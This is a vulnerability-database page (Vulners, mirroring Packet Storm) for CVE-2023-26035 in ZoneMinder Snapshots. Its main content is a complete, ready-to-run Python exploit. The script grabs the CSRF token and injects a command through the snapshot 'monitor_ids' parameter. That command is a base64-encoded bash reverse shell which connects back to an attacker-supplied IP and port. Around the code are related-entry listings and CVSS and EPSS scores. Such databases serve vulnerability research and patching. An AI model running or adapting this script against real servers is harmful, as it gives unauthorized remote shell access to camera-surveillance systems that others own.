Vulners
Lucene search
ZoneMinder Snapshots Remote Code Execution
🗓️ 19 Mar 2024 00:00:00Reported by Ravindu Wickramasinghe, github.comType 
packetstorm🔗 packetstormsecurity.com👁 261 Views
| Reporter | Title | Published | Views | Family All 43 |
|---|---|---|---|---|
 | ZoneMinder Snapshots Command Injection Exploit | 14 Nov 202300:00 | – | zdt |
| ZoneMinder Snapshots < 1.37.33 - Unauthenticated Remote Code Execution Exploit | 18 Mar 202400:00 | – | zdt |
 | Exploit for Missing Authorization in Zoneminder | 27 Dec 202318:44 | – | githubexploit |
| Exploit for Missing Authorization in Zoneminder | 24 Dec 202313:37 | – | githubexploit |
| Exploit for Missing Authorization in Zoneminder | 11 Dec 202319:23 | – | githubexploit |
| Exploit for Missing Authorization in Zoneminder | 12 Dec 202314:44 | – | githubexploit |
| Exploit for Missing Authorization in Zoneminder | 13 Dec 202315:40 | – | githubexploit |
 | CVE-2023-26035 | 25 Feb 202301:07 | – | alpinelinux |
 | CVE-2023-26035 | 10 Nov 202320:44 | – | circl |
 | ZoneMinder 安全漏洞 | 25 Feb 202300:00 | – | cnnvd |
10
`import re
import requests
from bs4 import BeautifulSoup
import argparse
import base64
# Exploit Title: Unauthenticated RCE in ZoneMinder Snapshots
# Date: 12 December 2023
# Discovered by : @Unblvr1
# Exploit Author: Ravindu Wickramasinghe (@rvizx9)
# Vendor Homepage: https://zoneminder.com/
# Software Link: https://github.com/ZoneMinder/zoneminder
# Version: prior to 1.36.33 and 1.37.33
# Tested on: Arch Linux, Kali Linux
# CVE : CVE-2023-26035
# Github Link : https://github.com/rvizx/CVE-2023-26035
class ZoneMinderExploit:
def __init__(self, target_uri):
self.target_uri = target_uri
self.csrf_magic = None
def fetch_csrf_token(self):
print("[>] fetching csrt token")
response = requests.get(self.target_uri)
self.csrf_magic = self.get_csrf_magic(response)
if response.status_code == 200 and re.match(r'^key:[a-f0-9]{40},\d+', self.csrf_magic):
print(f"[>] recieved the token: {self.csrf_magic}")
return True
print("[!] unable to fetch or parse token.")
return False
def get_csrf_magic(self, response):
return BeautifulSoup(response.text, 'html.parser').find('input', {'name': '__csrf_magic'}).get('value', None)
def execute_command(self, cmd):
print("[>] sending payload..")
data = {'view': 'snapshot', 'action': 'create', 'monitor_ids[0][Id]': f';{cmd}', '__csrf_magic': self.csrf_magic}
response = requests.post(f"{self.target_uri}/index.php", data=data)
print("[>] payload sent" if response.status_code == 200 else "[!] failed to send payload")
def exploit(self, payload):
if self.fetch_csrf_token():
print(f"[>] executing...")
self.execute_command(payload)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--target-url', required=True, help='target url endpoint')
parser.add_argument('-ip', '--local-ip', required=True, help='local ip')
parser.add_argument('-p', '--port', required=True, help='port')
args = parser.parse_args()
# generating the payload
ps1 = f"bash -i >& /dev/tcp/{args.local_ip}/{args.port} 0>&1"
ps2 = base64.b64encode(ps1.encode()).decode()
payload = f"echo {ps2} | base64 -d | /bin/bash"
ZoneMinderExploit(args.target_url).exploit(payload)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Mar 2024 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.17.2 - 9.8
EPSS0.55008